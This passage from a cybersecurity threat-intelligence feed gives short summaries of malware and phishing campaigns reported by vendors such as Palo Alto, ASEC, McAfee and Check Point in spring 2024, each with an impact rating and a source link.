Source: https://cert-agid.gov.it/news/riscontrata-una-costante-nella-sequenza-di-campagne-agenttesla-mirate-allitalia/

Intel Source:: Palo Alto

Intel Name:: Boggy_Serpens_Use_of_AutodialDLL

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: Researchers at PaloAlto have found that Boggy Serpens is exploiting the AutodialDLL function in the Windows Registry. They track an Iranian threat actor with state sponsorship under the name Boggy Serpens, also known as MuddyWater or TA450.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-Boggy-Serpens-use-of-AutodialDLL.txt

Intel Source:: 0DAY IN {REA_TEAM}

Intel Name:: WarZone_RAT_Distributing_via_DBatLoader_Using_Phishing_Emails

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: Researchers from 0DAY IN have discovered that a phishing email is using DBatLoader to spread the WarZone RAT. The user received an email from the attacker with a .html file attached. The PO-2200934-KINQTE.html file appears to contain scripts and a sizable blob of base64-encoded data when viewed in Hex mode.

Source: https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/

Intel Source:: Harfanglab

Intel Name:: Raspberry_Robin_anti_emulation_trick

Date of Scan:: 2024-04-09

Impact:: LOW

Summary:: An analysis of the constantly evolving evasion capabilities employed by the Raspberry Robin malware, which has emerged as a prominent threat. The report delves into the recent variant's unique anti-emulation techniques that leverage undocumented functions from the Windows Defender emulator's virtual DLLs, potentially marking the first instance of such exploitation. It highlights the malware's ability to evade detection and facilitate access for other threat actors, emphasizing the need for proactive countermeasures.

Source: https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/

Intel Source:: Palo Alto

Intel Name:: The_increased_activity_of_the_malware_initiated_vulnerability

Date of Scan:: 2024-04-09

Impact:: MEDIUM

Summary:: Unit 42 Palo Alto detected an increased number of threat actors turning to malware-initiated scanning attacks. Palo Alto blog shared the details of how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans. By launching scanning attacks from compromised hosts, attackers can accomplish the following: covering their traces, bypassing geofencing, Expanding botnets, and leveraging the resources of these compromised devices.

Source: https://unit42.paloaltonetworks.com/malware-initiated-scanning-attacks/

Intel Source:: ISC.SANS

Intel Name:: Enhancing_Endpoint_Security_Through_Threat_Hunting

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Researchers from ISC.SANS highlight the importance of integrating threat hunting into Security Operations Teams to enhance endpoint security. Despite relying on Endpoint Detection and Response (EDR) tools, continuous fine-tuning is essential for maximum effectiveness. A case study showcases how threat hunters detected an attempt to install a browser hijacker via a deceptive .msi file, evading detection by the EDR.

Source: https://isc.sans.edu/diary/rss/30816

Intel Source:: Any.Run

Intel Name:: Abusing_WebDAV_to_deliver_malicious_payload

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Any.Run analysts simulated the attack using a WebDAV file transfer protocol And they explained the details of how attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user’s PC using scripts or other methods.

Source: https://any.run/cybersecurity-blog/client-side-exploitation/

Intel Source:: ASEC

Intel Name:: Infostealers_Spread_via_Compromised_YouTube_Channels

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: ASEC researchers have discovered a cyber breach involving the compromise of well-known YouTube channels, used to distribute Vidar and LummaC2 malware. These malicious tools, categorized as infostealers, are capable of harvesting sensitive user data from infected devices and facilitating the installation of additional malware.

Source: https://asec.ahnlab.com/en/63980/

Intel Source:: CYFIRMA Research

Intel Name:: A_New_Campaign_Found_That_Is_Aimed_at_People_in_South_Asia

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered a sophisticated cyberthreat that is aimed at people in South Asia. Their research team discovered a malware campaign that used an executable from an SFX file that was misleading. These files are a component of a complex attack used to compromise systems and carry out malicious activities. They are embedded in the malicious binaries and fake PDF. Additional investigation suggests that Russian cybercriminals may have worked together, which raises questions about C2 infrastructure that targets people in South Asia.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_new-campaign-targeting-individuals-in-south-activity-7183078047187714048--alo?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Antiy

Intel Name:: Recent_activity_of_Youshe_malware_attack

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Recently, Antiy CERT has detected attacks carried out by the "Youshe" black product targeting companies and personnel related to finance and finance. There are three main types of initial malicious files dropped by attackers: executable programs, CHM files, and commercial remote control software "Third Eye". Most of the forged file names are related to finance and taxation, information, letters, etc.

Source: https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis_202404.html

Intel Source:: Trustwave

Intel Name:: Suspended_Domains_Show_Malevolent_Payload_for_Region_of_Latin_America

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Trustwave researchers have discovered a phishing campaign aimed at the Latin American continent. The phishing email had a ZIP attachment that, upon extraction, revealed an HTML page that, when opened, downloaded a malicious file that looked like an invoice.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/phishing-deception-suspended-domains-reveal-malicious-payload-for-latin-american-region/

Intel Source:: ASEC

Intel Name:: Malware_that_changes_the_Notepad_Plus_Plus_plugin

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: ASEC Lab did the analysis and could confirm that “mimeTools.dll,” a basic plugin for Notepad++, had been modified and distributed. The malicious mimeTools.dll file was included in the installation file of a specific version of the Notepad++ package and mimicked as a normal package file. mimeTools is a module that performs encoding functions such as Base64.

Source: https://asec.ahnlab.com/ko/63738/

Intel Source:: SOCRadar

Intel Name:: Mallox_ransomware_profile

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Mallox is a strain of ransomware and a group with the same name, encrypts its victims’ data and subsequently demands a ransom, typically in cryptocurrency. It is also called “TargetCompany,” “Tohnichi,” or “Fargo” ransomware and has been active since 2021.

Source: https://socradar.io/dark-web-profile-mallox-ransomware/

Intel Source:: SCmagazine

Intel Name:: NordVPN_posted_as_Bing_and_spreads_SecTopRAT_malware

Date of Scan:: 2024-04-08

Impact:: LOW

Summary:: Threat actors designed a fake website and a link that looked real to install NordVPN was found to lead to an installer for the remote access trojan SecTopRAT. Malwarebytes reported the malware campaign to both Microsoft, which owns Bing, and Dropbox.

Source: https://www.scmagazine.com/news/bing-ad-posing-as-nordvpn-aims-to-spread-sectoprat-malware

Intel Source:: Deepinstinct

Intel Name:: The_latest_C2_framework_attack_in_MuddyWater_activity

Date of Scan:: 2024-04-06

Impact:: MEDIUM

Summary:: Deepinstinct analysts dived into the details of the DarkBeatC2 attack framework, used by Iranian threat actors to target Israeli networks, and provided details on its capabilities and techniques. Also, it emphasizes the importance of sharing information and addressing vulnerabilities to prevent attacks and highlights the effectiveness of Deep Instinct's prevention-first capabilities.

Source: https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework

Intel Source:: Fortinet

Intel Name:: Byakugan_malware_phishing_attack

Date of Scan:: 2024-04-06

Impact:: MEDIUM

Summary:: FortiGuard Labs collected a sample that distributed a multi-functional new malware, Byakugan, discovered in January 2024 by FortiGuard Labs. It is distributed through a PDF file and has features such as screen monitoring, screen capture, and stealing browser information. It also has anti-analysis and persistence capabilities to avoid detection. Plus researchers shared information on the infection vector, webpage, features, and protections against the malware. It also includes IOCs for organizations to check if they have been impacted by this malware.

Source: https://www.fortinet.com/blog/threat-research/byakugan-malware-behind-a-phishing-attack

Intel Source:: ISC.SANS

Intel Name:: Using_Binary_Ninja_to_Chop_Up_DoNex

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Researchers at INC.SANS have noted that, considering the popularity and effectiveness of LockBit, it is not surprising that more recent ransomware groups have opted to incorporate a significant portion of the LockBit code base into their own following the LockBit source code release in mid-June 2022. Darkrace, a ransomware group that emerged around the middle of June 2023, is one of LockBit's more obvious spinoffs. Its samples closely resembled binaries from the disclosed LockBit builder, and it used a similar distribution process. Regrettably, Darkrace vanished from view when the LockBit clone's operators chose to remove its leak site.

Source: https://isc.sans.edu/diary/Slicing+up+DoNex+with+Binary+Ninja/30812/

Intel Source:: PaloAlto

Intel Name:: The_Most_Recent_Round_of_Action_For_KoiLoader_or_KoiStealer

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: PaloAlto researchers created an infection in a lab environment using the most recent round of KoiLoader/KoiStealer activities. The first bank-themed lures were released on 2024-04-02 earlier this week.

Source: https://www.linkedin.com/posts/unit42_koiloader-koistealer-unit42threatintel-activity-7181656774993747968-DphD?utm_source=share&utm_medium=member_ios

Intel Source:: Talos

Intel Name:: The_need_for_companies_to_upgrade_their_security_measures

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: The article provides a comprehensive overview of recent cybersecurity news and events. The "Top security headlines of the week" section highlights the joint charges and sanctions against a Chinese state-sponsored actor, a potential supply chain attack on Linux machines, and a backlog of vulnerabilities in the National Vulnerabilities Database. It also includes information about upcoming events and a list of prevalent malware files. The author also discusses the use of cybersecurity as an excuse for return-to-office policies and argues that security measures should remain consistent regardless of where employees are working from. The article emphasizes the need for companies to upgrade their security measures to combat the use of remote system management tools by adversaries.

Source: https://blog.talosintelligence.com/threat-source-newsletter-april-4-2024/

Intel Source:: SANSEC

Intel Name:: Vulnerability_in_Magento_Used_to_Install_Persistent_Backdoor

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: A novel technique for infection persistence on Magento servers is being employed by attackers. Researchers from Sansec have found that malware was automatically injected into the database using a well-designed layout template.

Source: https://sansec.io/research/magento-xml-backdoor

Intel Source:: Bitdefender

Intel Name:: Next_gen_info_stealers

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Bitdefender shared in their blog information about artificial intelligence in social media malvertising campaigns, where cybercriminals exploit AI-powered software to steal sensitive information from unsuspecting users. It also mentions the malware-as-a-service (MaaS) business model and details a particular malicious extension, Rilide Stealer V4.

Source: https://www.bitdefender.com/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/

Intel Source:: Malwarebytes

Intel Name:: NordVPN_Masquerade_Leads_to_Fake_Site

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Malwarebytes Labs researchers have discovered a malvertising campaign posing as the widely-used VPN service NordVPN. A malicious advertiser hijacks traffic from Bing searches, redirecting users to a fake site closely resembling the authentic NordVPN platform.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/04/bing-ad-for-nordvpn-leads-to-sectoprat

Intel Source:: Cisco Talos

Intel Name:: A_New_Threat_Group_Named_CoralRaider

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Researchers from Cisco Talos have identified a new threat actor known as "CoralRaider," who they assume is financially driven and of Vietnamese descent. CoralRaider has been targeting victims in several Asian and Southeast Asian nations since at least 2023. Credentials, bank information, and social media accounts including those for businesses and advertisements are the main targets of this group.

Source: https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/

Intel Source:: Sonicwall

Intel Name:: Updated_StrelaStealer_infostealer_targets_Europe

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Sonicwall researchers shared the analysis of the updated version of a malware called StrelaStealer, which is targeting European countries. The malware is delivered via JavaScript in email attachments and is designed to steal email account credentials from Outlook and Thunderbird.

Source: https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/

Intel Source:: Mandiant

Intel Name:: Chinese_Hacker_Groups_Exploit_Ivanti_Security_Flaws

Date of Scan:: 2024-04-05

Impact:: LOW

Summary:: Mandiant researchers have Identified several Chinese hacker groups exploiting vulnerabilities in Ivanti systems, particularly targeting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893. In addition, they have observed financially driven actors exploiting CVE-2023-46805 and CVE-2024-21887 to potentially engage in cryptocurrency mining activities.

Source: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement

Intel Source:: Resecurity

Intel Name:: JsOutProx_Malware_Targets_Financial_Institutions

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: Resecurity researchers discovered an updated iteration of JSOutProx, showcasing the malicious actors' persistent and sophisticated tactics through the exploitation of platforms such as GitHub and GitLab. Initially identified in 2019, JSOutProx continues to pose a substantial and evolving threat, especially targeting customers of financial institutions.

Source: https://www.resecurity.com/blog/article/the-new-version-of-jsoutprox-is-attacking-financial-institutions-in-apac-and-mena-via-gitlab-abuse

Intel Source:: ReversingLabs

Intel Name:: VS_Code_Extensions_Caught_Harvesting_Sensitive_Data

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: Researchers at ReversingLabs uncovered a recent malicious campaign featuring a range of malicious packages, from basic infostealers and downloaders to more sophisticated reverse shells and complex payloads. Among these, two Visual Studio Code extensions were discovered, characterized by their simple design and heavy reliance on sample code provided by Microsoft for VS Code beginners.

Source: https://www.reversinglabs.com/blog/malicious-helpers-vs-code-extensions-observed-stealing-sensitive-information

Intel Source:: Trend Micro

Intel Name:: Effect_on_LockBit_Post_Significant_Disruption

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: Trend Micro's latest publication offers significant insights into the aftermath of Operation Cronos, shedding light on LockBit's post-disruption strategies. Their research delves into telemetry data showcasing LockBit's transition to a .NET core, highlighting the necessity for innovative security detection methods. Furthermore, the exposure of LockBit's backend details has not only unveiled affiliate identities and victim information but also potentially disrupted trust and collaboration within the cybercriminal ecosystem.

Source: https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html

Intel Source:: Cyble

Intel Name:: Unveiling_the_Advanced_Tactics_of_the_Counterfeit_E_Commerce_Scheme

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: Cyble researchers have identified an escalating fake e-shop campaign targeting 18 Malaysian banks with upgraded malicious applications. This campaign, which initially targeted Malaysian banks, has expanded its scope to include banks in Vietnam and Myanmar. The latest iteration of the malware introduces advanced functionalities, including screen-sharing capabilities, the use of accessibility services, and complex communication with command and control servers.

Source: https://cyble.com/blog/elevating-the-stakes-the-enhanced-arsenal-of-the-fake-e-shop-campaign/

Intel Source:: Proofpoint

Intel Name:: Emergence_of_Latrodectus_Malware_in_Email_Threat_Campaigns

Date of Scan:: 2024-04-04

Impact:: MEDIUM

Summary:: Proofpoint researchers have noticed a recent addition to email threat campaigns called Latrodectus. It first surfaced in late November 2023. Although its presence declined in December 2023 and January 2024, it made a resurgence in February and March 2024. Latrodectus functions as a downloader and comes equipped with several features to evade sandbox detection. While it shares similarities with IcedID, it's a distinct malware believed to originate from the developers of IcedID.

Source: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice

Intel Source:: Norfolkinfosec

Intel Name:: North_Korea_threat_group_Python_Payloads

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: Norfolkinfosec researchers provided technical details of the second and third-stage malware used by a North Korean threat actor group. Their details included code analysis and names and hashes of the files involved like for example main.py which is an obfuscated Python script that downloads and executes the next two stages, while the brow.py file steals browser data and the pay.py file acts as a backdoor with keylogging capabilities.

Source: https://norfolkinfosec.com/north-koreas-post-infection-python-payloads/

Intel Source:: ASEC

Intel Name:: Rhadamanthys_Malware_Concealed_within_Groupware_Installer

Date of Scan:: 2024-04-04

Impact:: LOW

Summary:: ASEC researchers uncovered that Rhadamanthys malware was being distributed disguised as a groupware installer. The attackers created a fake website resembling the original and promoted it through online ads. The malware employs a stealthy technique called "indirect syscall" to evade detection by security tools, making it challenging to spot.

Source: https://asec.ahnlab.com/en/63864/

Intel Source:: McAfee

Intel Name:: A_significant_change_in_the_campaigns_that_distribute_Pikabot

Date of Scan:: 2024-04-03

Impact:: LOW

Summary:: Recently, McAfee Labs observed a significant change in the campaigns that distribute Pikabot. Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/

Intel Source:: Mcafee

Intel Name:: Diverse_Campaign_Tactics_and_Payload_Analysis

Date of Scan:: 2024-04-03

Impact:: LOW

Summary:: Pikabot, a malicious backdoor, has exhibited a significant evolution in its campaign tactics, distribution methods, and infection vectors since early 2023. McAfee Labs' recent analysis reveals distinctive campaign variations employed by Pikabot, including HTML, JavaScript, SMB share, Excel, and JAR campaigns. Each campaign utilizes unique infection chains, such as utilizing meta tag refreshes in HTML, leveraging JavaScript to execute curl.exe, exploiting the MonikerLink bug via SMB shares, embedding SMB share links in Excel files, and dropping payloads through JAR files.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/distinctive-campaign-evolution-of-pikabot-malware/

Intel Source:: SOC Radar

Intel Name:: The_Anatomy_of_Stealers

Date of Scan:: 2024-04-03

Impact:: LOW

Summary:: This article provides a comprehensive overview of stealer malware and its impact on cybersecurity. It emphasizes the need for continuous research and investigation into the operational mechanisms and tactics used by cybercriminals. The article also highlights the importance of threat intelligence and the use of the MITRE ATT&CK framework in understanding and defending against stealer malware. It discusses the characteristics and common techniques used by these malicious programs, as well as the need for continuous education and awareness, and the use of effective security tools and practices. The article also introduces the top five most common stealers and their unique features, and discusses the use of the MITRE ATT&CK framework in analyzing and understanding these threats. It also provides a detailed analysis of the Amadey Stealer malware and its techniques, as well as the top 15 most common ASN firms in stealer malware's IP connections. The article also discusses the prevalence of HTTP connections in stealer malware and the need for caution when considering blocking this protocol. It concludes by emphasizing the importance of integrating threat intelligence and using advanced cybersecurity solutions to detect and prevent these evolving threats.

Source: https://socradar.io/the-anatomy-of-stealers-how-are-they-stealing-our-information-where-are-they-taking-it/

Intel Source:: Domain tools

Intel Name:: The_resurgence_of_the_Manipulaters_cybercrime_group

Date of Scan:: 2024-04-03

Impact:: LOW

Summary:: The article discusses the resurgence of the "Manipulaters" team, a cybercrime group known for their spamming and phishing activities. The team uses various techniques such as DP access, "bulletproof" hosting, and forged identity documents to carry out their operations. They also rebrand and combine existing tools for their software applications, with a focus on selling spam services. The article provides specific domains, IP addresses, and email addresses associated with the Manipulaters and their use of the spamming tool HeartSender. The article also discusses the use of JavaScript and XML in HeartSender and mentions several email addresses and usernames linked to the Manipulaters. It also highlights registering nearly 500 domains associated with the email address "fudtoolshop@gmail.com" and using various aliases by the Manipulaters. The article urges businesses and consumers to remain vigilant against threat actor groups like the Manipulaters and provides resources for further information. It also includes a list of active shops and associated email addresses and usernames used by the Manipulaters. The article also delves into the history and current activities of the Manipulaters, their lack of technical sophistication, and their expansion into selling web domains. It also discusses their potential involvement in impersonating the USPS and their use of session cookie grabbers. The article highlights the Manipulaters' operational security failures and the potential risks to their own customers. It also mentions the compromise of several PCs associated with the Manipulaters and the exposure of customer data and operational details. The article concludes by providing information on two clusters of activity associated with the Manipulaters, including usernames, email addresses, and associated domains.

Source: https://www.domaintools.com/resources/blog/the-resurgence-of-the-manipulaters-team-breaking-heartsenders/

Intel Source:: Sucuri

Intel Name:: Magento_Ecommerce_Malware

Date of Scan:: 2024-04-03

Impact:: LOW

Summary:: The article discusses the threat of "Magento Shoplift" malware, which targets ecommerce websites using WordPress and Magento CMS platforms. The malware is designed to steal payment information and has been found in different forms, including one that disguises as a Google Analytics script. The author, a security analyst, provides steps for mitigating the risk of this malware, such as keeping CMS software and plugins updated and using strong passwords.

Source: https://blog.sucuri.net/2024/04/magento-shoplift-ecommerce-malware-targets-both-wordpress-magento-cms.html

Intel Source:: Crowdstrike

Intel Name:: XZ_Upstream_Supply_Chain_Attack

Date of Scan:: 2024-04-03

Impact:: HIGH

Summary:: The article discusses the CVE-2024-3094 vulnerability found in the XZ Utils library and how CrowdStrike is actively protecting its customers from potential exploitation. It provides an overview of the vulnerability, its impact, and how it can be detected and prevented using CrowdStrike's Falcon platform. The article also offers guidance for organizations to defend against the exploitation of this vulnerability, along with relevant hashes and additional resources for further information.

Source: https://www.crowdstrike.com/blog/cve-2024-3094-xz-upstream-supply-chain-attack/

Intel Source:: Intelcorgi

Intel Name:: Bellingcat_Malware_analysis

Date of Scan:: 2024-04-02

Impact:: LOW

Summary:: The analysis involves an email campaign targeting the journalist group Bellingcat, delivering a malicious zip file that ultimately deploys an HTTP reverse shell. The infection chain involves a malicious zip archive, a .lnk file masquerading as a PDF, and a PowerShell script executing a reverse shell that enables data exfiltration. The campaign is attributed to a Russia-nexus threat actor based on consistently targeting organizations critical of Russia.

Source: https://intelcorgi.com/2024/03/24/bellingcat-malware-investigation/

Intel Source:: Embeeresearch

Intel Name:: Additional_malicious_infrastructure_of_the_ACTINIUM_threat_group

Date of Scan:: 2024-04-02

Impact:: MEDIUM

Summary:: This report demonstrates the process of leveraging publicly available intelligence reports and passive DNS analysis tools to uncover additional malicious infrastructure associated with a specific threat actor, referred to as ACTINIUM. By analyzing patterns in domains, IP addresses, registration dates, and subdomain structures provided in an initial report by Microsoft, the analysis identifies 122 new domains exhibiting similar characteristics. The report serves as an educational guide on how analysts can expand on existing intelligence using accessible tooling and open-source data.

Source: https://www.embeeresearch.io/uncovering-apt-infrastructure-with-passive-dns-pivoting/

Intel Source:: Trend Micro

Intel Name:: DLL_Hijacking_and_API_Unhooking_in_the_Face_of_UNAPIMON_Malware

Date of Scan:: 2024-04-02

Impact:: LOW

Summary:: Researchers at Trend Micro found recent cyberespionage attack attributed to Earth Freybug, a sophisticated threat group known for its espionage and financially motivated activities. The attack employs dynamic-link library (DLL) hijacking and application programming interface (API) unhooking techniques to evade detection, particularly by a newly discovered malware named UNAPIMON

Source: https://www.trendmicro.com/en_us/research/24/d/earth-freybug.html

Intel Source:: linkedin(Perception Point)

Intel Name:: Venom_RAT_poses_a_threat_across_various_sectors

Date of Scan:: 2024-04-02

Impact:: LOW

Summary:: This article highlights how attackers are employing phishing emails to distribute Venom RAT, a variant of Quasar RAT, across a wide array of sectors including hotels, travel, trading, finance, manufacturing, industry, and government in countries like Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina. The threat actor TA558 is identified as the mastermind behind this extensive phishing campaign targeting Latin America.

Source: https://www.linkedin.com/feed/update/urn:li:activity:7180255262807572480/

Intel Source:: Bi.Zone

Intel Name:: Cloud_Werewolf_attacks_government_officials_in_Russia_and_Belarus

Date of Scan:: 2024-04-02

Impact:: LOW

Summary:: A cyberthreat group, identified as Cloud Werewolf, is conducting phishing campaigns targeting government employees in Russia and Belarus. The adversaries employ crafted emails mimicking legitimate documents, such as medical vouchers and federal orders, to lure victims into downloading malicious payloads. These payloads are hosted on remote servers, and their distribution is limited, allowing the threat actors to evade cybersecurity defenses within the targeted organizations.

Source: https://bi.zone/expertise/blog/cloud-werewolf-atakuet-gossluzhashchikh-rossii-i-belarusi-putevkami-na-lechenie-i-prikazami-sluzhb

Intel Source:: Checkpoint

Intel Name:: Agent_Tesla_targeting_US_and_Australia

Date of Scan:: 2024-04-02

Impact:: MEDIUM

Summary:: Check Point Research discovered a recent malware campaign of Agent Tesla operation which targeted American and Australian organizations. Phishing campaigns mainly target organization email credentials to access entities and perform further campaigns but with the next goal, to execute the malware samples of Agent Tesla. After further investigation, CPR tracked down the activity of 2 cyber-crime actors behind Agent Tesla operations with the evidence of being connected with each other: Bignosa and Gods.

Source: https://research.checkpoint.com/2024/agent-tesla-targeting-united-states-and-australia/

Intel Source:: TheDFIRreport

Intel Name:: IcedID_Malware_Leveraged_in_Multi_Stage_Attack

Date of Scan:: 2024-04-01

Impact:: LOW

Summary:: In a cyber intrusion that occurred between late February and late March 2023, threat actors exploited a phishing campaign using Microsoft OneNote files to deliver the IcedID malware. The attack evolved through multiple stages, starting with IcedID deployment and persistence establishment. Subsequently, the attackers leveraged Cobalt Strike and AnyDesk to target file and backup servers, followed by data exfiltration using FileZilla and deployment of Nokoyawa ransomware.

Source: https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/

Intel Source:: Checkpoint

Intel Name:: Cyberattacks_in_Multiple_Countries_Using_the_Linux_Version_of_DinodasRAT

Date of Scan:: 2024-04-01

Impact:: MEDIUM

Summary:: Researchers at Check Point have been closely observing the actions of a threat actor with a Chinese connection that is targeting Southeast Asia, Africa, and South America through cyber espionage. This action closely corresponds with the findings that Trend Micro researchers made available to the public in their thorough examination of Earth Krahang, a threat actor. One noteworthy tool in this actor's arsenal is a cross-platform backdoor called DinodasRAT, alias XDealer, which was previously seen in assaults carried out by the Chinese threat actor LuoYu.

Source: https://research.checkpoint.com/2024/29676/

Intel Source:: ASEC

Intel Name:: Deceptive_Malware_Distribution_via_Google_Ads_Tracking

Date of Scan:: 2024-04-01

Impact:: MEDIUM

Summary:: AhnLab Security Intelligence Center (ASEC) has uncovered a sophisticated malware distribution campaign exploiting Google Ads tracking. The attackers disguise malicious software as installers for popular groupware like Notion and Slack, tricking users into downloading and executing malware onto their systems. Through a complex redirection sequence, users are led to a seemingly legitimate landing page, where malware payloads are injected into critical Windows files. This Rhadamanthys malware poses a significant threat as it operates stealthily within legitimate system processes, enabling data theft without user detection.

Source: https://asec.ahnlab.com/en/63477/

Intel Source:: Malwation

Intel Name:: New_MuddyWater_Campaigns

Date of Scan:: 2024-04-01

Impact:: MEDIUM

Summary:: The MuddyWater APT group has recently launched new attacks in Israel, Africa, and Turkiye using products developed in-house and taking over third-party tools. Phishing attacks use PDF attachments with agents from services like Atera and ConnectWise. Once installed, actors gain privileges to monitor and execute files. MuddyWater is expanding tactics to reduce digital footprint, likely increasing spear-phishing via compromised accounts. Technical analysis shows tailored attack files named for targets. Compromised business accounts used to build agents, increasing victim persuasion. Remote access tools ensure persistence and capabilities like command execution and file operations. MuddyWater aligns attacks with Iran's interests, adding techniques and using legitimate tools for anonymity.

Source: https://www.malwation.com/blog/new-muddywater-campaigns-after-operation-swords-of-iron

Intel Source:: Jamf Threat Labs

Intel Name:: Hackers_target_macOS_users_with_malicious_ads_spreading_Stealer_Malware

Date of Scan:: 2024-04-01

Impact:: LOW

Summary:: Researchers from Jamf Threat Labs discovered that attackers are targeting individuals in the crypto industry, recognizing the potential for substantial profits. Those involved in this sector must remain highly vigilant, as public information often reveals their status as asset holders or their association with crypto-related companies, making them prime targets.

Source: https://www.jamf.com/blog/infostealers-pose-threat-to-macos/

Intel Source:: CYFIRMA Research

Intel Name:: ACR_Stealer_Promotion_on_a_Well_Known_Russian_Forum

Date of Scan:: 2024-04-01

Impact:: LOW

Summary:: Researchers from Cyfirma have discovered that an ACR stealer is being promoted on a well-known Russian forum. The threat actors' OPSEC errors allowed them to follow the compromised bots, which led us to the samples. These were all gathered at roughly the same time in late December 2023 and have less than ten VT detections between them. The timeframe aligns with the threat actor's story, which describes how they started out operating in secret before going public.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_acr-stealer-is-being-advertised-on-a-prominent-activity-7179498200632872960-S6Jb?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Moonlock

Intel Name:: Masked_macOS_stealer_found

Date of Scan:: 2024-04-01

Impact:: LOW

Summary:: Researchers at Moonlock Lab examined AppleScript and Bash's payload hosted on a remote server and concluded that suspicious pieces of software have a big risk to the security and privacy of unsuspecting users. Moonlock blog details there the info about these threats posed by the Apple/Bash payload, the trojan’s modus operandi, and the potential consequences for macOS users.

Source: https://moonlock.com/macos-stealer-apple-bash-payload

Intel Source:: Huntress

Intel Name:: Malicious_activity_on_endpoints_running_MSSQL_Server_or_MSSQL_Express

Date of Scan:: 2024-03-29

Impact:: MEDIUM

Summary:: Huntress SOC analysts tracked the new alerts showing malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations or as part of a larger application package installation. A recent series of incidents across three endpoints running the Fortinet Enterprise Management Server (EMS) system were initiated by alerts

Source: https://www.huntress.com/blog/mssql-to-screenconnect

Intel Source:: PaloAlto

Intel Name:: Exploiting_FortiClient_EMS_Vulnerability_Actively

Date of Scan:: 2024-03-29

Impact:: MEDIUM

Summary:: Researchers from Unit 42 have discovered ongoing exploits for the recently discovered FortiClient EMS vulnerability, CVE-2023-48788. Unauthorized installs of Meterpreter, ScreenConnect Client, and Atera Agent were caused by this action.

Source: https://www.linkedin.com/posts/unit42_atera-screenconnect-meterpreter-activity-7179196571689922560-tgvm?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Netcraft

Intel Name:: Attacks_on_USPS_and_global_postal_services

Date of Scan:: 2024-03-29

Impact:: LOW

Summary:: Chinese Phishing-as-a-Service platform ‘darcula’ targets organizations in multiple countries with sophisticated techniques using more than 20,000 phishing domains. ‘darcula’ [sic] is a new, sophisticated Phishing-as-a-Service (PhaaS) platform used on more than 20,000 phishing domains that provide cyber criminals with easy access to branded phishing campaigns.

Source: https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/

Intel Source:: Adlumin

Intel Name:: Zero_Trust_Solution_Misconfiguration_Enables_Threat_Actors_to_Bypass_2FA

Date of Scan:: 2024-03-29

Impact:: LOW

Summary:: Adlumin researchers detected a breach where attackers evaded Duo, a widely-used zero-trust security tool, to illicitly access a company's networks. Adlumin urges organizations to review user access policies for accuracy and evaluate the security implications of allowing select users to bypass 2FA.

Source: https://adlumin.com/post/misconfiguration-in-zero-trust-solution-could-allow-threat-actors-to-bypass-2fa/

Intel Source:: Rapid7

Intel Name:: Technical_analysis_of_IDAT_Loader_to_download_BruteRatel

Date of Scan:: 2024-03-29

Impact:: MEDIUM

Summary:: This month, in two recent investigations, Rapid7’s Managed Detection & Response team observed the IDAT loader being used again. Based on the recent tactics, techniques, and procedures tracked, Rapid7's team confirmed the activity is associated with financially motivated threat groups.

Source: https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel/

Intel Source:: PaloAlto

